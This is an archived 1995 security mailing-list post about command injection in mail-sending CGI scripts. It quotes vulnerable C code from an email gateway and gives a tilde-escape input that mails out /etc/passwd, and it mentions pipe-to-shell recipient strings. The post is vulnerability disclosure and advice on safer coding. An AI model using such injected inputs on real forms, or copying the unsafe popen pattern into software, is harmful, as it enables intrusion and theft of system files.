More holes, was: Re: SECURITY HOLE: FormMail

[ivo () nijenrode nl (Ivo)]

In message <199508042344.QAA20408 () Csli Stanford EDU> Christian Wettergren write
s
> | Just to be helpful, the way to do it more safely, without massive
> | need for checking is to build a complete mail message, including
> | header, and hand that to "sendmail -t" which then reads the recipient
> | information out of the constructed header.  [Sendmail should of course
> | be an invocation of smail or pp, not the BSD program of that name,
> | given the history of problems that has had]
>
> I suspect this still wont take care of emails to pipes or files,
> i.e  <|/bin/sh> or </.rhosts>, it is a legitimate, albeit unexpected,
> mail-command going to sendmail. So unless these two mode are totally
> stripped out of the sendmail, there will exist a vulnerability there,
> wont it?

I've written an email-cgi package myself, and for this package I've used
a simple smtp client written by Wietse Venema. I've been familiar with bugs
like tilde-escapes etc. for a while, and this smtp client does not have
any fancy switches, escapes, options etc.

Ok, of course you should not use popen() or system() (C) or open/syste, (perl)
(at least not withouth filtering out '|;' etc), but fork combined with
execve works fine and secure.

You can find smtp.c in the wwwutils package at
ftp://ftp.win.tue.nl/pub/infosystems/www/wwwutils.tar.gz
or directly at
ftp://ftp.nijenrode.nl/pub/people/ivo/smtp.c

Also (perhaps someone already reported this), Thomas Boutell's Email Handler
(http://siva.cshl.org/email/index.html)
seems to suffer from this problem. I've reported this a very long time ago
to him, but it seems he hasn't fixed it. Thomas Boutell is maintainer of
the WWW-FAQ, and he refers to his handler in it, so it *might* be that
a lot of people are using it! Here's a piece of code from email.c:

    sprintf(buf, "/usr/bin/mail %s", entries[recipientid].val);
    out = popen(buf, "w");
    fprintf(out, "Subject: %s\n", entries[subjectid].val);
    fprintf(out, "Reply-To: %s\n", entries[emailid].val);
    fprintf(out, "Supposedly-From: %s\n", entries[nameid].val);
    fprintf(out, "[This message was sent through the www-email gateway.]\n");
    fprintf(out, "--\n");
    fprintf(out, "%s\n", entries[contentid].val);
    pclose(out);


The popen() here doesn't seem to be insecure, the cgi first checks the
recipient against a list of users which are defined in a local configfile
(which location is hardcoded into the source).

However, this program directly sends the entire message to /usr/bin/mail,
including ~-escapes. I've been able to send myself, using this program,
a copy of the passwd file by simply typing
~!/bin/mail ivo () nijenrode nl < /etc/passwd
in the message-entry of the form. This was on AIX 2.3.

Happy hacking,

        Ivo

------------------------------------------------------------------------
Name:     Ivo van der Wijk  | It won't give up it wants me dead
Internet: ivo () nijenrode nl  | this goddamn noise inside my head
Aka:      www () nijenrode nl  |
IRC:      VladDrac          |                                |\|||/|
URL:      http://www.nijenrode.nl/~ivo
------------------------------------------------------------------------